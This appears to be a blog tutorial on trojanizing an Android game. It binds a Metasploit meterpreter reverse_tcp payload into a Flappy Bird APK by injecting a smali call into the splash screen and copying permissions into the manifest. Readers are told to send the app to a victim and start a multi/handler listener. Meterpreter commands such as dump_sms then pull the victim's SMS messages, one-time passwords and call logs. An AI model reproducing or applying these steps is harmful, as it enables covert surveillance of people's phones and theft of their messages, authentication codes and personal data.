Banner ads

bind payload in game and hack android

bind payload in game and hack android- Hi guys if you are searching for bind payload in game and hack android and searching for the best article to get the best explanation bind payload in game and hack android. Then you are in the right place.

Today I'm here going to share the step by step tutorial about "bind payload in game and hack android". By this article, you can get a lot of about how to bind payload with apk, msfvenom android, how to hack over internet. And I'm damn sure that you will never get all these unique information like us on the internet anywhere else.


bind payload in game and hack android
bind payload in game and hack android



bind payload in game and hack android

Hello, guy's I am back with another amazing post so today we will get to know about how we can bind Metasploit payload with a game and hack android like ha hacker so we are already learned about what is payload and how to create and hack android devices over wan and lan but in this today's post we will bind or inject our malicious payload with the android game and exploit it over wan or lan it works on both. So now let's go through the practical part of payload binding.

#Follow below step's

1. Make sure you already created payload from Metasploit if not then please read our recent post about how to create payload and exploit ( Click Here )

2. Now after creating the payload follow below steps.

3. Download Apk editor pro fro here ( Click Here )

Now. open apk editor pro app after installing it and click on Select An apk From File and then your internal storage of the device will be opened and when you scroll down you can see your payload. And click on it and click on Full Edit (Resource-Rebuild) and the Decode All Files and now you can see the app main page with some columns. Now in the downside of the app you can see Files click on it and here you can see many folders of app which are used to make app functional. Now click on Smali and let it decompile the dex (mali files) Now when decompilation is done you can see a new Smali folder in the same window. Now click open it by click on it and inside that you can see Com folder now once again click on it and inside Com you can see Metasploit folder now click on the checkbox and click on Extract and when you click on extract your internal storage will be shown in a small window. Now long click on an anything a small button or pop up appears New folder just click on it and create a new folder with name Payload and click on ok after that a folder will be created in you internal storage now open it by click on it and when it opens click on Ok. Now here the Metasploit folder will be saved into the payload folder. So now click back button in apk editor and stop when you see the home screen of files. Now click on the checkbox of AndroidManifest.xml and Click on the extract and save that on the same payload folder. Now both Metasploit and XML files are saved in the payload folder now.

4. Now Download Flappy bird game from here ( Click Here )

So. this is the game in which we will bind our payload and exploit. Now open apk editor pro apk and click on Select An Apk from File and select Flappy bird game from the internal storage and Click on Decode All Files and nowhere also you can See Files icon Click on it and when it open you can see many folders related to app and Now click on Smali and wait for it to decompile and after that, a Smali folder will be shown in the same window and now click on Smali folder and open it and inside it once again click on Com folder and nowhere click on folder icon with + sign and when you click on it you will option Import folder now click on it and select Payload folder in your internal storage ( which contains payload files ) and open payload folder and click on Metasploit folder and Click on Ok then the Metasploit folder will be imported to Com folder of Flappy bird apk. Now come back to Smali folder and click on Com and the on Com and then on Dotgears and Then Flappy and inside it, you need to search SplashScreen.smali now click on it and an editor will be opened now in editor find 30th line of code

#Virtualmethods

After getting this now below 30th code paste this code.

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

And after pasting this code click on the Save button and the save process will be completed.
Now come back to Home screen of Flappy bird apk in apk editor and nowhere click on AndroidManifest.xml now inside this we need to inject some android permissions so. Click on it and an editor will be opened. So when xml will be opened in the editor. now back to file manager of your device and open payload folder and open android manifest file by clicking on it and when it opens now copy this (<uses-permission android: name) all permissions which start with a tag like this now copying all of them come back to apk editor XML file and inside and paste that copied permissions here in xml after the code (<uses-sdk android:) below this code line. Now pasting all of the permissions now click on Save and now click on Build button to build the apk. So the build process can take some tim to complete so after completed the apk will be available in-app editor folder in a file manager.

5. Now send that apk to your target and let him install and open it when he does so. Now follow the below steps.

#STEP 2 (EXPLOITING LAST STEP)

$ cd $HOME/metasploit-framework

$ ./msfconsole

now open new (2nd) session and apply these commands

$  pg_ctl -D $PREFIX/var/lib/postgresql start (not that important in LAN)

now come back to (1st session) in which you opened Metasploit now apply these commands.

$ db_status

$ use exploit/multi/handler

$ set payload android/meterpreter/reverse_tcp

$ set lhost (your ip here) or Portmap host address

$ set lport (the port you given)

$ exploit

#STEP 3 (HACKING DETAILS AFTER METERPRETER SESSION)

Now when you get meterpreter session of your victim device follow the below steps to get his info.

Ex :-

meterpreter> help

(Now here all the commands to dump data will be shown now use them according to you needs for example.)

meterpreter > dump_sms

This command gets all our victims mobile SMS and OTP's and it will be saved in .txt formate like sms5563543bbfbbff.txt 

Like this you can fetch and save many things as I said in the beginning of this post and to see saved or fetched data.

$ cd $HOME/metasploit-framework

$ ls

Here, you will get all the saved .txt call logs and information and etc... to see that

$ cat calllogs586464dec564.txt

This will show all info in script formate. So guys that's all for today so I hope you liked this one. So like this whenever your victim plays the game you will the session and you can use it without any issues.

how to bind payload in apk in pdf version

English ----> Click Here 
Kannada ----> Click Here
Tamil ----> Click Here
Urdu ----> Click Here
Hindi ----> Click Here



 websites I used in the video

Click Here


watch the practical video here ( part 1 )

Click Here

watch the practical video here ( part 2 )

Click Here

watch the practical video here ( part 3 )

Click Here

watch the practical video here ( part 4 )

Click Here

watch the practical video here ( part 5 )

Click Here

watch the practical video here ( part 6 )

watch the practical video here ( part 7 )

Click Here


 Follow this carefully
Please don't skip the video ...
So guys follow the steps as I showed from starting of the video to the end of the video ok. So after all, if you are facing any problem then comment or use contact us page, please........

Errors or issue reasons

  • Command error 

  • Data connection problem 

  • Big letters using in commands 

  • Giving more space b/n words 

  • lack of patience

    "Solution for all these problems is watching a video without skip until the end"

    Link for cript/Tool will be available below
    Click On Below Button


    Post a Comment

    0 Comments